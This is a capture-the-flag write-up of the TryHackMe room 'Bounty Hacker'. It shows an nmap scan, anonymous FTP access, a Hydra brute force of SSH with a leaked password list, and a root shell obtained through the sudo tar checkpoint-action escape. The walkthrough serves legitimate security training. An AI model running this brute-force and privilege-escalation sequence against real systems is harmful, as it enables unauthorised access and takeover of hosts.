Skip to main content

Bounty Hacker writeup [thm]

Bounty Hacker

You talked a big game about being the most elite hacker in the solar system. Prove it and claim your right to the status of Elite Bounty Hacker!

You were boasting on and on about your elite hacker skills in the bar and a few Bounty Hunters decided they'd take you up on claims! Prove your status is more than just a few glasses at the bar. I sense bell peppers & beef in your future!

Bounty Hacker is yet another simple beginner-friendly challenge from THM. Let's get right to it.

Find open ports on the machine

We run a nmap scan against the server:

$: nmap -A $target 

Host is up (0.048s latency).
Not shown: 967 filtered ports, 30 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| Can't get directory listing: TIMEOUT
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.9.5.219
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 4
|      vsFTPd 3.0.3 - secure, fast, stable
|End of status
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 
|                    (Ubuntu Linux; protocol 2.0)
|ssh-hostkey: 
|   2048 dc:f8:df:a7:a6:00:6d:18:b0:70:2b:a5:aa:a6:14:3e (RSA)
|   256 ec:c0:f2:d9:1e:6f:48:7d:38:9a:e3:bb:08:c4:0c:c9 (ECDSA)
|   256 a4:1a:15:a5:d4:b1:cf:8f:16:50:3a:7d:d0:d8:13:c2 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|http-server-header: Apache/2.4.18 (Ubuntu)
|http-title: Site doesn't have a title (text/html).
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

So we have FTP, SSH and a web server to play with. We start out by checking out the web server. It's well worth a look but nothing of interest is to be found there.

Who wrote the task list?

What task list? There's no task list that I could find on the website so let's try the FTP server. According to the nmap scan it allows anonymous login.

$: ftp $target       

Connected to $target.
220 (vsFTPd 3.0.3)
Name ($target:[REDACTED]): anonymous
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 ftp     ftp     418 Jun 07  2020 locks.txt
-rw-rw-r--    1 ftp     ftp      68 Jun 07  2020 task.txt

We found the task list. Download both files locks.txt and task.txt.

task.txt:

    1.) Protect Vicious.
    2.) Plan for Red Eye pickup on the moon.

    -lin

So we have a good candidate for a username we can use in later attacks.

What service can you bruteforce with the text file found?

Clearly it's SSH.

What is the users password?

The contents of locks.txt looks like it maybe could be passwords. So we have a list of 26 passwords to try in combination with the username lin. We could do it manually but we let Hydra do the heavy lifting for us.

$: hydra -V -l lin -P locks.txt $target -t 4 ssh                              

[22][ssh] host: $target   login: lin   password: [REDACTED] 
1 of 1 target successfully completed, 1 valid password found

Yay, it worked, we have a password!

user.txt

We can now SSH into the server using the password obtained from Hydra.

$: ssh lin@$target  

lin@bountyhacker:~/Desktop$ cat user.txt 
[REDACTED]

root.txt

Time for some privilege escalation. We try the old trick of looking for files with SETUID permissions:

lin@bountyhacker:~/.config$ find / -user root -perm /4000 2>/dev/null 

/usr/sbin/pppd
/usr/bin/chfn
/usr/bin/passwd
/usr/bin/chsh
/usr/bin/gpasswd
/usr/bin/pkexec
/usr/bin/newgrp
/usr/bin/sudo
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/xorg/Xorg.wrap
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox
/usr/lib/snapd/snap-confine
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/bin/umount

Alright, nothing looks out of the ordinary and all of the candidates for privilege escalation are properly locked down.

What programs, if any, are we allowed to run as root?

lin@bountyhacker:~/Desktop$ sudo -l
[sudo] password for lin: 
Matching Defaults entries for lin on bountyhacker:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:
    /usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User lin may run the following commands on bountyhacker:
    (root) /bin/tar

We can run tar as root!

Sudo (tar) If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access.

- GTFOBins

By running:

$: sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh

We got r00t.

$: whoami
root
$: cd /root 
$: cat root.txt
[REDACTED]

Feels damn good to be a Elite Bounty Hacker.

Conclusion

Bounty Hacker is an OK beginner challenge following the typical nmap -> get some info -> hydra -> shell -> privesc route. The privesc took me a few minutes to get right but besides from that it almost felt a bit too easy but I think it's good practice nevertheless even though it wasn't very challenging.

One improvement is that I'm getting better at keeping markdown notes of what I'm doing every step of the way. These notes are verbose and also includes things that didn't work and why they didn't work. If I don't finish a challenge in one sitting it get's a whole lot easier to get back in to it at a later time.

Doing public writeups also becomes less of a hassle, I pretty much delete all of the irrelevant parts and add some comments if necessary.

It's a good little challenge. It's probably more fun if you are a complete beginner and never seen Hydra or GTFOBins before.